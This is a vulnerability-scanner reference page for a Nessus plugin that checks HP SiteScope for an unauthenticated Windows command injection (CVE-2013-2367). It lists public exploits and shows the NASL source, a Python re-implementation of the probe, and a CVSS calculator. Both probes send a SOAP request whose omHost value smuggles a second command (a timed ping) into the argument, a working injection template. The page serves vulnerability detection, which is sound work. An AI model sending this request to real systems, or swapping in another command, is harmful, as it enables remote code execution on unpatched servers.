HP SiteScope SOAP Call runOMAgentCommand SOAP Request Arbitrary Remote Code Execution - Nessus

Critical   Plugin ID: 69983

This page contains detailed information about the HP SiteScope SOAP Call runOMAgentCommand SOAP Request Arbitrary Remote Code Execution Nessus plugin, including available exploits and PoCs found on GitHub, in Metasploit or in Exploit-DB for verifying this vulnerability.

Plugin Overview


ID: 69983
Name: HP SiteScope SOAP Call runOMAgentCommand SOAP Request Arbitrary Remote Code Execution
Filename: hp_sitescope_runomagentcommand.nasl
Vulnerability Published: 2013-07-29
This Plugin Published: 2013-09-19
Last Modification Time: 2021-01-19
Plugin Version: 1.16
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies: hp_sitescope_detect.nasl, os_fingerprint.nasl
Required KB Items: www/sitescope

Vulnerability Information


Severity: Critical
Vulnerability Published: 2013-07-29
Patch Published: 2013-07-29
CVE: CVE-2013-2367
CPE: cpe:/a:hp:sitescope

Synopsis

A web application on the remote host has a Windows command injection vulnerability.

Description

The version of HP SiteScope hosted on the remote web server has a Windows command injection vulnerability. The application hosts a web service that allows the runOMAgentCommand() method to be invoked without authentication. A remote, unauthenticated attacker could exploit this to run arbitrary Windows commands.

Solution

Upgrade to HP SiteScope 11.22 or later.

Public Exploits


Target Network Port(s): 8080
Target Asset(s): Services/www
Exploit Available: True (Metasploit Framework, Exploit-DB, Immunity Canvas, Core Impact, D2 Elliot)
Exploit Ease: Exploits are available

Here's the list of publicly known exploits and PoCs for verifying the HP SiteScope SOAP Call runOMAgentCommand SOAP Request Arbitrary Remote Code Execution vulnerability:

  1. Metasploit: exploit/multi/http/hp_sitescope_uploadfileshandler
    [HP SiteScope Remote Code Execution]
  2. Metasploit: exploit/windows/http/hp_sitescope_runomagentcommand
    [HP SiteScope Remote Code Execution]
  3. Exploit-DB: exploits/windows/remote/28188.rb
    [EDB-28188: HP SiteScope (Windows) - Remote Code Execution (Metasploit)]
  4. D2 Elliot: hp_sitescope_runomagentcommand_11.20_rce.html
    [HP SiteScope runOMAgentCommand 11.20 RCE]
  5. Immunity Canvas: D2ExploitPack

Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered an illegal activity.

WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.

Risk Information


CVSS V2 Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C
CVSS Base Score: 10.0 (High)
Impact Subscore: 10.0
Exploitability Subscore: 10.0
CVSS Temporal Score: 8.3 (High)
CVSS Environmental Score: NA (None)
Modified Impact Subscore: NA
Overall CVSS Score: 8.3 (High)
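The scores above follow from the vector by the CVSS v2 formulas. The script below is an added example (not code from this page, from Tenable or from NVD) that reproduces the base, impact, exploitability and temporal scores using the CVSS v2 guide's metric weights; it uses Decimal arithmetic with round-half-up so that the 8.265 temporal product rounds to 8.3 as displayed rather than being subject to binary floating-point noise. The severity bands are NVD's qualitative ratings for CVSS v2.

```python
"""CVSS v2 scoring, written to reproduce the scores displayed for this plugin.
Added example: formulas and weights are those of the CVSS v2 guide, not code
from Nessus. Decimal with ROUND_HALF_UP mirrors the spec's round_to_1_decimal."""
from decimal import Decimal, ROUND_HALF_UP

# Metric weights from the CVSS v2 specification (as strings, so Decimal is exact)
WEIGHTS = {
    "AV": {"L": "0.395", "A": "0.646", "N": "1.0"},
    "AC": {"H": "0.35", "M": "0.61", "L": "0.71"},
    "Au": {"M": "0.45", "S": "0.56", "N": "0.704"},
    "C":  {"N": "0.0", "P": "0.275", "C": "0.660"},
    "I":  {"N": "0.0", "P": "0.275", "C": "0.660"},
    "A":  {"N": "0.0", "P": "0.275", "C": "0.660"},
    # Temporal metrics; ND (not defined) carries weight 1.0
    "E":  {"U": "0.85", "POC": "0.9", "F": "0.95", "H": "1.0", "ND": "1.0"},
    "RL": {"OF": "0.87", "TF": "0.90", "W": "0.95", "U": "1.0", "ND": "1.0"},
    "RC": {"UC": "0.90", "UR": "0.95", "C": "1.0", "ND": "1.0"},
}
BASE_METRICS = ("AV", "AC", "Au", "C", "I", "A")
TEMPORAL_METRICS = ("E", "RL", "RC")


def parse_vector(vector: str) -> dict:
    """'AV:N/AC:L/...' -> {'AV': 'N', ...}; rejects unknown metrics or values."""
    metrics = {}
    for part in vector.split("/"):
        name, _, value = part.partition(":")
        if name not in WEIGHTS or value not in WEIGHTS[name]:
            raise ValueError(f"bad CVSS v2 metric: {part!r}")
        metrics[name] = value
    missing = set(BASE_METRICS) - metrics.keys()
    if missing:
        raise ValueError(f"base metrics missing: {sorted(missing)}")
    return metrics


def round1(value: Decimal) -> Decimal:
    """The spec's round_to_1_decimal (half-up, one decimal place)."""
    return value.quantize(Decimal("0.1"), rounding=ROUND_HALF_UP)


def cvss2_scores(vector: str) -> dict:
    """Impact, exploitability, base and (when any of E/RL/RC is given) temporal score."""
    m = parse_vector(vector)
    one = Decimal(1)

    def w(name: str) -> Decimal:
        return Decimal(WEIGHTS[name][m[name]])

    impact = Decimal("10.41") * (one - (one - w("C")) * (one - w("I")) * (one - w("A")))
    exploitability = Decimal(20) * w("AV") * w("AC") * w("Au")
    f_impact = Decimal("1.176") if impact else Decimal(0)
    base = round1((Decimal("0.6") * impact + Decimal("0.4") * exploitability
                   - Decimal("1.5")) * f_impact)
    scores = {"impact": round1(impact), "exploitability": round1(exploitability),
              "base": base}
    if any(name in m for name in TEMPORAL_METRICS):
        # The temporal score multiplies the *rounded* base; absent metrics count as ND
        factor = one
        for name in TEMPORAL_METRICS:
            factor *= Decimal(WEIGHTS[name][m.get(name, "ND")])
        scores["temporal"] = round1(base * factor)
    return scores


def severity(score: Decimal) -> str:
    """NVD qualitative bands for CVSS v2: Low < 4.0 <= Medium < 7.0 <= High."""
    if score >= 7:
        return "High"
    return "Medium" if score >= 4 else "Low"


if __name__ == "__main__":
    for vec in ("AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C",   # this plugin
                "AV:N/AC:L/Au:N/C:P/I:P/A:P"):                # the common 7.5 case
        s = cvss2_scores(vec)
        print(vec, s, severity(s["base"]))
```

For this plugin's vector the impact term is 10.41 * (1 - 0.34^3) = 10.0008, the exploitability term 20 * 1.0 * 0.71 * 0.704 = 9.9968, and the base score ((0.6 * 10.0008) + (0.4 * 9.9968) - 1.5) * 1.176 = 9.995, all of which round to 10.0; the temporal score is 10.0 * 0.95 (E:F) * 0.87 (RL:OF) * 1.0 (RC:C) = 8.265, rounded to 8.3.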


Plugin Source


This is the hp_sitescope_runomagentcommand.nasl Nessus plugin source code. This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(69983);
  script_version("1.16");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");

  script_cve_id("CVE-2013-2367");
  script_bugtraq_id(61506);

  script_name(english:"HP SiteScope SOAP Call runOMAgentCommand SOAP Request Arbitrary Remote Code Execution");
  script_summary(english:"Tries to issue runOMAgentCommand SOAP call");

  script_set_attribute(
    attribute:"synopsis",
    value:
"A web application on the remote host has a Windows command injection
vulnerability."
  );
  script_set_attribute(
    attribute:"description",
    value:
"The version of HP SiteScope hosted on the remote web server has a
Windows command injection vulnerability.  The application hosts a web
service that allows the runOMAgentCommand() method to be invoked without
authentication.  A remote, unauthenticated attacker could exploit this
to run arbitrary Windows commands."
  );
  script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-13-205/");
  # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c03861260-1
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?4a20c50c");
  script_set_attribute(attribute:"solution", value:"Upgrade to HP SiteScope 11.22 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"HP SiteScope runOMAgentCommand 11.20 RCE");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'HP SiteScope Remote Code Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'D2ExploitPack');

  script_set_attribute(attribute:"vuln_publication_date", value:"2013/07/29");
  script_set_attribute(attribute:"patch_publication_date", value:"2013/07/29");
  script_set_attribute(attribute:"plugin_publication_date", value:"2013/09/19");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:sitescope");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("hp_sitescope_detect.nasl", "os_fingerprint.nasl");
  script_require_keys("www/sitescope");
  script_require_ports("Services/www", 8080);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");

port = get_http_port(default:8080);
install = get_install_from_kb(appname:'sitescope', port:port, exit_on_fail:TRUE);

# We don't test for non-Windows
if (report_paranoia < 2)
{
  os = get_kb_item_or_exit('Host/OS');
  if ('Windows' >!< os) exit(0, 'This plugin does not run against a non-Windows host.');
}

http_disable_keep_alive();
hdr = make_array('SOAPAction', '""');
url = install['dir'] + '/services/APIBSMIntegrationImpl';

# Our injected command will consume <delay> seconds run time
delay = 20;

xml = '<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope
 xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
 xmlns:xsd="http://www.w3.org/2001/XMLSchema"
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <soapenv:Body>
    <ns1:runOMAgentCommand
     soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
     xmlns:ns1="http://Api.freshtech.COM">
        <properties href="#id0"/>
        <command xsi:type="xsd:string">OPCACTIVATE</command>
    </ns1:runOMAgentCommand>
    <multiRef id="id0"
      soapenc:root="0"
      soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
      xsi:type="ns2:Map"
      xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
      xmlns:ns2="http://xml.apache.org/xml-soap">
        <item>
          <key xsi:type="soapenc:string">omHost</key>
          <value xsi:type="soapenc:string">&quot;127.0.0.1 &amp; ping -n ' + delay + ' localhost&quot;</value>
        </item>
    </multiRef>
  </soapenv:Body>
</soapenv:Envelope>';

# This plugin causes remote host to run:
# 1) cscript.exe C:\Program Files\HP\HP BTO Software\bin\OpC\install\opactivate.vbs
# 2) and the Windows command(s) we injected
#
# The remote server does not return an HTTP response until these programs return.
# On a host with HP Operations Agent installed, if the "OpenView Ctrl Service" is not started,
# the opactivate.vbs script will try to start the service, this can take some time (seen > 30 seconds)
#
# The run time for opcactivate.vbs may not be deterministic.
# Here we set a reasonably long timeout so that we can get a response
http_set_read_timeout(150 + delay);

#
# It seems the affected version is vulnerable only if HP Operations Agent is installed.
# The Agent installation is part of HP SiteScope installation, and by default is not installed.
#
# When the Agent is not installed, C:\Program Files\HP\HP BTO Software\bin\OpC\install\opactivate.vbs is not present,
# and our injected command is not run. In this case, the response time for the POST request is significantly faster.
#
# The vulnerable server will take at least <delay> seconds to respond.
#
#
for (i = 0; i < 2; i++)
{
  t1 = unixtime();
  res = http_send_recv3(
    method:'POST',
    item:url,
    port:port,
    data:xml,
    add_headers:hdr,
    content_type:'text/xml; charset=utf-8',
    exit_on_fail:TRUE
  );
  t2 = unixtime();
  resp_time = t2 - t1;

  # No response
  if (isnull(res[0])) audit(AUDIT_RESP_NOT, port);

  # Missing response body
  if (isnull(res[2])) audit(AUDIT_RESP_BAD, port);

  # Non-affected version returns HTTP status code 500
  if (res[0] =~ '^HTTP/[0-9]+\\.[0-9]+ 500') audit(AUDIT_WEB_APP_NOT_AFFECTED, 'SiteScope', build_url(qs:install['dir'], port:port));

  # Unexpected response
  # Vulnerable version should return status 200 and contain 'runOMAgentCommandResponse' in the response body
  if (! (res[0] =~ '^HTTP/[0-9]+\\.[0-9]+ 200' && res[2] =~ 'runOMAgentCommandResponse')) audit(AUDIT_RESP_BAD, port);

  # Faster response
  # HP Operations Agent likely not installed and thus not vulnerable
  if (resp_time < delay) audit(AUDIT_WEB_APP_NOT_AFFECTED, 'SiteScope', build_url(qs:install['dir'], port:port));

  # Wait a bit before next trial run
  sleep(1);
}

report = NULL;
if (report_verbosity > 0)
{
  snip =  crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30);
  report = 'Nessus was able to verify the vulnerability with the following request :\n' +
           snip + '\n' +
           http_last_sent_request() + '\n' +
           snip;
}
# Server takes at least <delay> seconds to respond for each of the several requests; likely vulnerable
security_hole(port:port, extra:report);

The latest version of this script can be found in these locations depending on your platform:

  • Linux / Unix:
    /opt/nessus/lib/nessus/plugins/hp_sitescope_runomagentcommand.nasl
  • Windows:
    C:\ProgramData\Tenable\Nessus\nessus\plugins\hp_sitescope_runomagentcommand.nasl
  • Mac OS X:
    /Library/Nessus/run/lib/nessus/plugins/hp_sitescope_runomagentcommand.nasl
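The plugin above is a blind, time-based check: it invokes runOMAgentCommand with command OPCACTIVATE and smuggles a Windows command into the quoted omHost argument, then decides from the HTTP status, the response body and the elapsed time whether the injected sleep actually ran. The script below is an added example, not Tenable's code and not part of this page: it re-implements the same request and the same decision rules in Python so the check can be run, or its verdict reasoned about, outside Nessus. Only probe() touches the network; build_envelope(), classify() and verdict() run offline. The SiteScope install directory in the usage hint (/SiteScope) is an assumption; use the path that hp_sitescope_detect.nasl reports for the target. Like the plugin, this check is intrusive: a vulnerable host runs cscript opcactivate.vbs plus the injected ping on every trial, and the plugin only runs it against hosts fingerprinted as Windows unless report paranoia is raised.

```python
"""Stand-alone re-implementation of the timing check performed by plugin 69983.
Added example, not Tenable's code: same SOAP request, same decision rules.
Standard library only; Python 3.7+."""
import sys
import time
import urllib.error
import urllib.request

# Axis endpoint the plugin posts to, relative to the SiteScope install directory
SOAP_PATH = "/services/APIBSMIntegrationImpl"
# Patched builds answer the unauthenticated call with HTTP 500
STATUS_PATCHED = 500
# A successful call echoes this element name in the SOAP response body
RESPONSE_MARKER = "runOMAgentCommandResponse"


def build_envelope(delay: int) -> str:
    """SOAP envelope the plugin sends: runOMAgentCommand with the OPCACTIVATE
    command and an omHost map entry whose value closes the quoted argument and
    appends 'ping -n <delay> localhost' as a benign sleep primitive."""
    injected = f"&quot;127.0.0.1 &amp; ping -n {delay} localhost&quot;"
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope
 xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
 xmlns:xsd="http://www.w3.org/2001/XMLSchema"
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <soapenv:Body>
    <ns1:runOMAgentCommand
     soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
     xmlns:ns1="http://Api.freshtech.COM">
        <properties href="#id0"/>
        <command xsi:type="xsd:string">OPCACTIVATE</command>
    </ns1:runOMAgentCommand>
    <multiRef id="id0"
      soapenc:root="0"
      soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
      xsi:type="ns2:Map"
      xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
      xmlns:ns2="http://xml.apache.org/xml-soap">
        <item>
          <key xsi:type="soapenc:string">omHost</key>
          <value xsi:type="soapenc:string">{injected}</value>
        </item>
    </multiRef>
  </soapenv:Body>
</soapenv:Envelope>"""


def classify(status: int, body: str, elapsed: float, delay: int) -> str:
    """Apply the plugin's rules to one response. Returns:
      'not_affected'  HTTP 500: the call is rejected (patched build)
      'unexpected'    neither the patched nor the vulnerable signature
      'agent_missing' call accepted but answered faster than the injected sleep:
                      opcactivate.vbs (HP Operations Agent) is absent, so the
                      injected command never ran
      'vulnerable'    call accepted and the answer took at least <delay> seconds"""
    if status == STATUS_PATCHED:
        return "not_affected"
    if status != 200 or RESPONSE_MARKER not in body:
        return "unexpected"
    if elapsed < delay:
        return "agent_missing"
    return "vulnerable"


def verdict(outcomes) -> str:
    """Combine repeated trials as the plugin does: every trial must come back
    'vulnerable'; otherwise the first differing outcome is the result."""
    for outcome in outcomes:
        if outcome != "vulnerable":
            return outcome
    return "vulnerable"


def probe(base_url: str, delay: int = 20, trials: int = 2) -> str:
    """POST the envelope <trials> times to <base_url><SOAP_PATH> and return the
    verdict. base_url is the SiteScope install URL (path is an assumption)."""
    url = base_url.rstrip("/") + SOAP_PATH
    data = build_envelope(delay).encode("utf-8")
    headers = {"SOAPAction": '""', "Content-Type": "text/xml; charset=utf-8"}
    outcomes = []
    for _ in range(trials):
        req = urllib.request.Request(url, data=data, headers=headers, method="POST")
        started = time.monotonic()
        try:
            # Same generous read timeout as the plugin: opcactivate.vbs may block
            with urllib.request.urlopen(req, timeout=150 + delay) as resp:
                status, body = resp.status, resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:
            status, body = err.code, err.read().decode("utf-8", "replace")
        outcomes.append(classify(status, body, time.monotonic() - started, delay))
        time.sleep(1)  # short pause between trials, as in the plugin
    return verdict(outcomes)


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: check.py http://HOST:8080/SiteScope   (install path assumed)")
    print(probe(sys.argv[1]))
```

Reading the verdicts: 'agent_missing' means the unauthenticated call is still accepted by the application, so the host is unpatched even though the injected command had nothing to run against; treat it as a reason to upgrade to 11.22 or later rather than as a clean result, which is the one place this script is stricter in its reporting than the plugin, which audits it as not affected.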


How to Run


Here is how to run the HP SiteScope SOAP Call runOMAgentCommand SOAP Request Arbitrary Remote Code Execution plugin on its own via the Nessus web user interface (https://localhost:8834/):

  1. Click to start a New Scan.
  2. Select Advanced Scan.
  3. Navigate to the Plugins tab.
  4. On the top right corner click to Disable All plugins.
  5. On the left side table select CGI abuses plugin family.
  6. On the right side table select HP SiteScope SOAP Call runOMAgentCommand SOAP Request Arbitrary Remote Code Execution plugin ID 69983.
  7. Specify the target on the Settings tab and click to Save the scan.
  8. Run the scan.

Here are a few examples of how to run the plugin from the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.

Basic usage:

/opt/nessus/bin/nasl hp_sitescope_runomagentcommand.nasl -t <IP/HOST>

Run the plugin with audit trail message on the console:

/opt/nessus/bin/nasl -a hp_sitescope_runomagentcommand.nasl -t <IP/HOST>

Run the plugin with trace script execution written to the console (useful for debugging):

/opt/nessus/bin/nasl -T - hp_sitescope_runomagentcommand.nasl -t <IP/HOST>

Run the plugin using a state file for the target and updating it (useful for running multiple plugins on the target):

/opt/nessus/bin/nasl -K /tmp/state hp_sitescope_runomagentcommand.nasl -t <IP/HOST>


References


BID | SecurityFocus Bugtraq ID: 61506

See also:
  • https://www.zerodayinitiative.com/advisories/ZDI-13-205/
  • http://www.nessus.org/u?4a20c50c (HPE document emr_na-c03861260-1)

Similar and related Nessus plugins:
  • 69195 - HP SiteScope Multiple Unspecified Remote Code Execution Vulnerabilities
  • 76284 - HP AutoPass License Server Remote Code Execution (HPSBMU03045)
  • 57700 - HP Managed Printing Administration < 2.6.4 Multiple Vulnerabilities
  • 57701 - HP Managed Printing Administration jobDelivery Script Directory Traversal (intrusive check)
  • 93844 - HP Network Automation RMI Registry Java Object Deserialization RCE
  • 76776 - HP OneView < 1.10 OpenSSL Multiple Vulnerabilities (HPSBGN03068)
  • 43155 - HP OpenView Network Node Manager Multiple Scripts hostname Parameter Remote Command Execution
  • 51850 - HP OpenView Performance Insight Server Backdoor Account
  • 90099 - HP Operations Orchestration 10.x < 10.51 Java Object Deserialization RCE
  • 44109 - HP Power Manager < 4.2.10
  • 62099 - HP SiteScope getFileInternal Arbitrary File Download
  • 101299 - HP SiteScope Multiple Vulnerabilities (HPESBGN03763)
  • 79719 - HP SiteScope SSLv3 Padding Oracle On Downgraded Legacy Encryption Vulnerability (POODLE)
  • 76769 - HP Smart Update Manager 6.x < 6.4.1 Multiple Vulnerabilities
  • 81917 - HP Universal Configuration Management Database Server Authentication Bypass
  • 102803 - HP iLO 4 <= 2.52 RCE
  • 140770 - HP iLO 3 < 1.93 / HP iLO 4 < 2.75 / HP iLO Superdome 4 < 1.64 / HP iLO 5 < 2.18 / HP Moonshot/Edgeline iLO 5 < 2.30 Ripple20 Multiple vulnerabilities
  • 29249 - HP OpenView Network Node Manager Multiple CGI Remote Overflows
  • 19555 - HP OpenView Network Node Manager Multiple Scripts Remote Command Execution
  • 51645 - HP OpenView Network Node Manager Remote Execution of Arbitrary Code (HPSBMA02621 SSRT100352)
  • 35657 - HP OpenView Network Node Manager webappmon.exe Command Injection (c01661610)

Version


This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file hp_sitescope_runomagentcommand.nasl version 1.16. For more plugins, visit the Nessus Plugin Library.
